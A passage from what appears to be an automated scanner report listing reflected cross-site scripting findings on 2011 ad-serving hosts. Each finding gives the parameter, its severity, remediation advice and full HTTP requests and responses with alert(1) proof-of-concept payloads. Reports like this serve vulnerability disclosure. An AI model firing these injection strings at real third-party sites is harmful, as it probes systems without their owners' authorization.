Set-Cookie: liday1=x6!2#N5HGH:SAxO; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:54:43 GMT
Pragma: no-cache
Content-Length: 2619
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<span id="10288627">');
//raw JavaScript
document.write('<scr'+'ipt language=\'javascr'+'ipt\' type=\'text/javascr'+'ipt\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?tid=6832
...[SNIP]...
d = '261950';
var asci_publiid = '3449146';
var asci_sectid = '2298003';
var asci_advliid = '3329023';
var asci_cid = '10288627';
var asci_p = '99';
var asci_refurl = escape('http://www.tmz.com/72a06';alert(1)//5908bbe03b7');
if ( asci_refurl.length >
...[SNIP]...

4.41. http://adnxs.revsci.net/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 906f3'-alert(1)-'8a5c815ddd2 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250906f3'-alert(1)-'8a5c815ddd2&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:50 GMT
Content-Length: 454

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250906f3'-alert(1)-'8a5c815ddd2&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250906f3%27-alert%281%29-%278a5c815ddd2%26s%3D229800
...[SNIP]...

4.42. http://adnxs.revsci.net/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3e33'-alert(1)-'9eac11f134b was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250&s=2298003f3e33'-alert(1)-'9eac11f134b&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:53:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:53:10 GMT
Content-Length: 454

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003f3e33'-alert(1)-'9eac11f134b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003f3e33%27-alert%281%29-%279eac11f134b%26r%3D1%26_salt%3D1576960469%26u%3Dhttp%253A
...[SNIP]...

4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 379d8<script>alert(1)</script>9352c1ee60b was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495&pid=2083767379d8<script>alert(1)</script>9352c1ee60b&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:04 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "2083767379d8<script>alert(1)</script>9352c1ee60b"

   
                                                           </head>
...[SNIP]...

4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload cb6e8--><script>alert(1)</script>c9166046b4e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495cb6e8--><script>alert(1)</script>c9166046b4e&pid=2083767&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:47 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3356
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1500495cb6e8--><script>alert(1)</script>c9166046b4e" -->
...[SNIP]...

4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 92fce--><script>alert(1)</script>3d86a354bdc was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767&ps=-192fce--><script>alert(1)</script>3d86a354bdc&zw=250&zh=325&url=http%3A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/&v=5&dct=Nancy%20Grace%20--%20RUMPSHAKIN'%20in%20the%20TMZ%20Ballroom!!%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3870
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-192fce--><script>alert(1)</script>3d86a354bdc" -->
   
...[SNIP]...

4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b778"-alert(1)-"c081c9a4e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2475049&2b778"-alert(1)-"c081c9a4e0=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?2b778"-alert(1)-"c081c9a4e0=1&Z=1x1&s=2475049&_salt=2441704624";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960fe"><script>alert(1)</script>af24f5e639e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2475049&960fe"><script>alert(1)</script>af24f5e639e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4712
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?960fe"><script>alert(1)</script>af24f5e639e=1&Z=1x1&s=2475049&_salt=983545231&t=2" target="_parent">
...[SNIP]...

4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 7b4c8<script>alert(1)</script>7900287ce39 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=10397677b4c8<script>alert(1)</script>7900287ce39&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:49:31 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "10397677b4c8<script>alert(1)</script>7900287ce39"

   
                                                           </head>
...[SNIP]...

4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 1c8c0--><script>alert(1)</script>d8f33500b41 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=14593081c8c0--><script>alert(1)</script>d8f33500b41&pid=1039767&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:58 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3321
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "14593081c8c0--><script>alert(1)</script>d8f33500b41" -->
...[SNIP]...

4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4ea7c--><script>alert(1)</script>2eed884a416 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=1039767&ps=-14ea7c--><script>alert(1)</script>2eed884a416&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3760
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14ea7c--><script>alert(1)</script>2eed884a416" -->
   
...[SNIP]...

4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the ad_creative_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba94d'%3balert(1)//bdd52ed5568 was submitted in the ad_creative_id parameter. This input was echoed as ba94d';alert(1)//bdd52ed5568 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522ba94d'%3balert(1)//bdd52ed5568&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
Date: Sat, 17 Sep 2011 01:53:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
hone1.value + document.alertForm.phone2.value + document.alertForm.phone3.value;
var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo;
   url += '&creativeID=10000522ba94d';alert(1)//bdd52ed5568&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg';

   
       var leagueId = _gel('leagueId').value;
       if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId;
       els
...[SNIP]...

4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the ad_referral_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bfe2'%3balert(1)//712e3a0ece8 was submitted in the ad_referral_url parameter. This input was echoed as 5bfe2';alert(1)//712e3a0ece8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg5bfe2'%3balert(1)//712e3a0ece8&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
Date: Sat, 17 Sep 2011 01:51:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
ue;
var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo;
   url += '&creativeID=10000522&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg5bfe2';alert(1)//712e3a0ece8';

   
       var leagueId = _gel('leagueId').value;
       if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId;
       else url += "&teamID=" + _gel('teamId').value;
   

if (window.XMLHttpReque
...[SNIP]...

4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_bg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c0f"><script>alert(1)</script>584e56fd634 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef90c0f"><script>alert(1)</script>584e56fd634&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17277
Date: Sat, 17 Sep 2011 01:52:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000;background-color:#efefef90c0f"><script>alert(1)</script>584e56fd634">
...[SNIP]...

4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the color_bg request parameter is copied into the HTML document as plain text between tags. The payload 235f2<script>alert(1)</script>4125eaa7b51 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

